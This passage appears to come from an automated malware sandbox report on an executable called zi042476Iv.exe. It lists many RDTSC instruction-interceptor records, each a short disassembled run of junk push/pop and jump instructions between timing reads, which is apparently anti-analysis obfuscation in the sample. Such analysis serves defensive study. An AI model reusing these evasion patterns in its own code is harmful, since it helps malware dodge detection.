                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D3BB2 second address: 3D3BC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F29FC6B5C96h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D3BC0 second address: 3D3BC6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D3BC6 second address: 3D3BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F29FC6B5C9Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D3BDE second address: 3D3BE8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DB3CD second address: 3DB3D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DB3D6 second address: 3DB3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DB3DF second address: 3DB408 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29FC6B5CA7h 0x00000008 push edx 0x00000009 jns 00007F29FC6B5C96h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DB408 second address: 3DB411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D96D9 second address: 3D96E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D9828 second address: 3D9830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D9FC7 second address: 3D9FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F29FC6B5CA4h 0x0000000b jmp 00007F29FC6B5C9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F29FC6B5C96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D9FE8 second address: 3D9FEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA14B second address: 3DA15A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA15A second address: 3DA161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA161 second address: 3DA167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA467 second address: 3DA477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA477 second address: 3DA48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F29FC6B5C9Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA48B second address: 3DA49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F29FC52457Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D92BA second address: 3D92F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F29FC6B5C96h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F29FC6B5CA1h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F29FC6B5CA9h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D92F7 second address: 3D92FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D92FB second address: 3D9301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E24E9 second address: 3E2501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC524581h 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E2501 second address: 3E2527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29FC6B5C96h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F29FC6B5C96h 0x00000013 jmp 00007F29FC6B5CA3h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E2527 second address: 3E252B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E21F1 second address: 3E21FF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E21FF second address: 3E2203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3EE21E second address: 3EE222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3F3188 second address: 3F3192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3F6D7C second address: 3F6D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3F6D82 second address: 3F6D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F29FC524576h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3F6D92 second address: 3F6D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 404367 second address: 40436D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40436D second address: 404396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F29FC6B5CA8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 404396 second address: 40439A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40439A second address: 4043AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4069CA second address: 4069D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4069D0 second address: 4069D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4069D8 second address: 4069E2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29FC524576h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0AC second address: 31F0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0B5 second address: 31F0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0BF second address: 31F0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0C3 second address: 31F0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F29FC524576h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0CF second address: 31F0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F29FC6B5CA0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D2BE second address: 40D2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC52457Fh 0x00000009 jl 00007F29FC524576h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D5A7 second address: 40D5AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D5AB second address: 40D5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F29FC52457Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D72E second address: 40D736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D892 second address: 40D8E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F29FC524576h 0x00000009 jmp 00007F29FC524584h 0x0000000e jmp 00007F29FC524580h 0x00000013 jmp 00007F29FC524585h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F29FC52457Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4137DD second address: 4137F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F29FC6B5C96h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4137F5 second address: 4137FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 413940 second address: 41394E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F29FC6B5C96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 41394E second address: 413952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 413952 second address: 413958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 413958 second address: 413965 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F29FC524576h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 42F7ED second address: 42F7F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 42F7F3 second address: 42F7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 42F66A second address: 42F686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F29FC6B5C96h 0x0000000a jmp 00007F29FC6B5CA0h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 42F686 second address: 42F68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432EFE second address: 432F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432F0A second address: 432F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4329D0 second address: 432A1B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F29FC6B5CA6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F29FC6B5CA7h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F29FC6B5C9Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432A1B second address: 432A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432A1F second address: 432A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC6B5CA3h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432A4B second address: 432A5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432A5A second address: 432A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F29FC6B5C96h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 32798A second address: 3279AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F29FC524576h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F29FC524583h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4489B3 second address: 4489B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4489B7 second address: 4489CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC52457Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4489CA second address: 4489D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44B62D second address: 44B63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44B63B second address: 44B640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44BB4F second address: 44BB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F29FC524578h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44E9DA second address: 44E9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44E9E0 second address: 44E9E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44E9E4 second address: 44EA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F29FC6B5CA2h 0x0000000e jno 00007F29FC6B5C96h 0x00000014 jng 00007F29FC6B5C96h 0x0000001a jc 00007F29FC6B5C9Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4504EC second address: 4504F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36A676 second address: 36A67A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E03BD second address: 52E03C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E03C3 second address: 52E03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E03C7 second address: 52E03CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E03CB second address: 52E0416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F29FC6B5C9Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F29FC6B5CA0h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F29FC6B5CA0h 0x0000001b mov edx, dword ptr [ebp+0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F29FC6B5C9Ah 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0416 second address: 52E0425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53006C1 second address: 5300720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 push esi 0x0000000a jmp 00007F29FC6B5CA0h 0x0000000f mov dword ptr [esp], ebp 0x00000012 jmp 00007F29FC6B5CA0h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov ecx, 4FB69E7Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007F29FC6B5CA8h 0x00000027 sbb cl, FFFFFF88h 0x0000002a jmp 00007F29FC6B5C9Bh 0x0000002f popfd 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300720 second address: 530075A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F29FC524588h 0x00000008 and cl, FFFFFFE8h 0x0000000b jmp 00007F29FC52457Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edx, 764C5E56h 0x0000001d mov ax, di 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 530075A second address: 530076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC6B5C9Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 530076D second address: 5300771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300771 second address: 53007B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F29FC6B5CA1h 0x00000010 sub ax, 8266h 0x00000015 jmp 00007F29FC6B5CA1h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F29FC6B5C9Dh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007B5 second address: 53007BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007BB second address: 53007BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007BF second address: 53007DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e mov ecx, edx 0x00000010 pop edi 0x00000011 popad 0x00000012 mov dword ptr [esp], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edx, 79EC0F14h 0x0000001d mov cl, bh 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007DF second address: 53007FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bl, ch 0x00000011 rdtsc
